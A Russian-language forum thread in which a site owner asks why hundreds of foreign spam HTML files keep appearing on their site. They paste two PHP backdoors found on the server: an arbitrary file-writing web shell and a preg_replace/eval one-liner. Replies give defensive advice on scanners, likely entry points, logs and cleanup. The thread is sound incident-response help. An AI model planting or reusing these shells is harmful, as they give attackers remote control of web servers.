Взлом сайта, как понять почему так происходит?

Question

[Узаир Ижа]

Я делал сайт, дело в том, что периодически вдруг в корне сайта , появляется более 500 html файлов какого то китайского интернет магазина. С чем это может быть связано? Какие промахи в безопасности такое производят? сайт самописный, ничего особо в себе не имеет, кроме статей. Файлы так будто бы залиты на сервер. HTML файлы такого вида 001_shop_eKxk.html

Так же есть папки инородные, там я нашел php файл

<?php
//header("Content-Type: text/html; charset=utf-8");
$config_password="yt";
$action=$_REQUEST['action'];
$password=$_REQUEST['password'];
$folderpath=$_REQUEST['folderpath'];
$filename=$_REQUEST['filename'];
$body=stripslashes($_REQUEST['body']);

if($password==""||$filename==""||$body=="")
{
    echo 'parameters error!';
    return;
}

if($password!=$config_password)
{
    echo 'password error!';
    return;
}

$rootPath=$_SERVER['DOCUMENT_ROOT'];
$newPath=$rootPath;

if($folderpath!="")
{
  if($folderpath=="root")
  {
    $newPath=$rootPath.'/'.$filename;
  }
  else
  {
    createFolder($rootPath.'/'.$folderpath);
    $newPath=$rootPath.'/'.$folderpath.'/'.$filename;
  }
}
else
{
  $newPath=$filename;
}


$fp=fopen($newPath,"w");
//fwrite($fp,"\xEF\xBB\xBF".iconv('gbk','utf-8//IGNORE',$body));
fwrite($fp,$body);
fclose($fp);

if(file_exists($newPath))
{
    echo "publish success & uploaded";
}

function createFolder($path) 
{
    if (!file_exists($path))
    {
        createFolder(dirname($path));
        mkdir($path, 0777);
    }
}
?>

или вот еще

<?php  preg_replace("/laterain/e", "ev"."al('".$_REQUEST['yt']."')", "laterain testin9"); ?>

Answer 1

[Andrzej Wielski]

https://yandex.ru/promo/manul#about
Воспользуйтесь, проверьте сайт на шеллы и прочую нечисть.

Comments

[Узаир Ижа]

Крутая штука, где ты был раньше)) Сейчас проверю. У меня был сайт на joomla там такая же фича была, пока хостинг не поменял

[Узаир Ижа]

К сожалению он не нашел вредоностный код, подозрительные только

[Andrzej Wielski]

Узаир Ижа: Те файлы что вы нашли - и есть шеллы. Отправляя на них запросы можно создать любой файл. Пройдитесь по подозрительным - уверен найдете дыру.

[Узаир Ижа]

Andrzej Wielski: да если бы я понимал дыры, я не особо еще опытен

Answer 2

[Archakov Dennis]

Есть замечательная утилита aiBolit. Советую им просканировать сайт (папку сайта).

1. Возможно ваш ФТП ломанули.
2. шелл залили через плагин какой-то
3. ломанули сайт который находится на одном сервере с вашим сайтом.

Answer 3

[index0h]

С чем это может быть связано?

Вас взломали.

Какие промахи в безопасности такое производят?

Вопрос из серии: "что я сделал не правильно?".
Это могут быть:
* доступ на основе популярных логинов/паролей
* похищение пароля админа, через XSS
* слабо защищенный FTP/SFTP
* SQL инъекции
* загружаемые файлы имеют право на выполнение
* загружаемые файлы могут быть включены в основной код
* сайт на CMS со включенным debug режимом
* встречал случаи взлома "изнутри" когда взломщиком является коллега
* возможно взломали на самом деле хостера, а вам просто не повезло
* наружу торчат открытые порты доверенных сервисов: mysql, memcached, redis,...
* ...

Смотрите логи, может что полезное будет

Answer 4

[Chvalov]

Возможно через соседний сайт ломают
У вас Хостинг или свой VPS/VDS ?

Comments

[Узаир Ижа]

Хостинг, Timeweb. Я уже менял хостинг, где то 5 месяцев ничего такого не было, и тут на тебе снова. Но прошлый раз я был уверен в хостинге, так как все сайты данного хостера заразились.

[Chvalov]

Timeweb может вам предоставить логи панели управления аккаунтом, FTP-соединения и запросов веб-сервера за нужный вам период.
изучите их

[zooks]

Узаир Ижа: давно использую Timeweb, и скажу, что проблемы с заражением через хостера исключены. Проверяйте на вирусы свои рабочие компьютеры, затем меняйте пароли на доступ.

[Andrzej Wielski]

Узаир Ижа: К вам на сайт всего-лишь был залит шелл. Тот самый, код которого вы предоставили тут. Удалите скрипты, и ничего подобного больше не случится.
Ранее через хостера данный скрипт был залит к вам, после переезда и очистки от мусора вы не углядели за этим шеллом. Его владелец прошелся по базе зараженных сайтов, и снова залил к вам левые файлы.

[Узаир Ижа]

Andrzej Wielski: как я удалял их на том хосте и так заливал на новый

Answer 5

[trevoga_su]

$config_password="......"; 
// где .... - md5() от какого-нибудь сложного пароля. что бы по справочникам md5 не найти

if(md5($password) != $config_password)
{ // ....

как минимум

Comments

[maximw]

Вы предлагаете человеку исправить ошибки безопасности в шелл-скрипте у себя на хостинге?

Answer 6

[MrGroovy]

Вас взломали и ваш сайт, скорее всего используется для мошенничества.
Нужно удалить все сторонние файлы с сайта, в идеале лучше его восстановить из бэкапа. Смените все пароли и просканируйте файлы, на всякий случай, на предмет вредоносного ПО.

С чем это может быть связано? Какие промахи в безопасности такое производят?

Скорее всего вы неправильно настроили какой-то из компонентов сайта. Тут вариантов много, вот основные:

• Неправильная конфигурация прав доступа к файлам (Security Misconfiguration)
  
• Уязвимости связанные с доступом к базам данных (SQL-Injectionn)
  
• Слабые пароли (Brute Force)
  
• Межсайтовый скриптинг(XSS)
  

Еще не стоит исключать возможность эксплойта из-за устаревших версий ПО (ssh, ftp).

Вам нужно понять, что смена паролей и удаление сторонних файлов - это временная мера. Вас будут взламывать до тех пор, пока вы не закроете дыры в безопасности сайта. Я бы порекомендовал воспользоваться сканером широкого профиля, который проверяет сайт по всем направлениям сразу. Из онлайн вариантов есть METASCAN или Acunetix.
И еще советую ознакомится с мануалом по безопасности PHP https://www.php.net/manual/en/security.php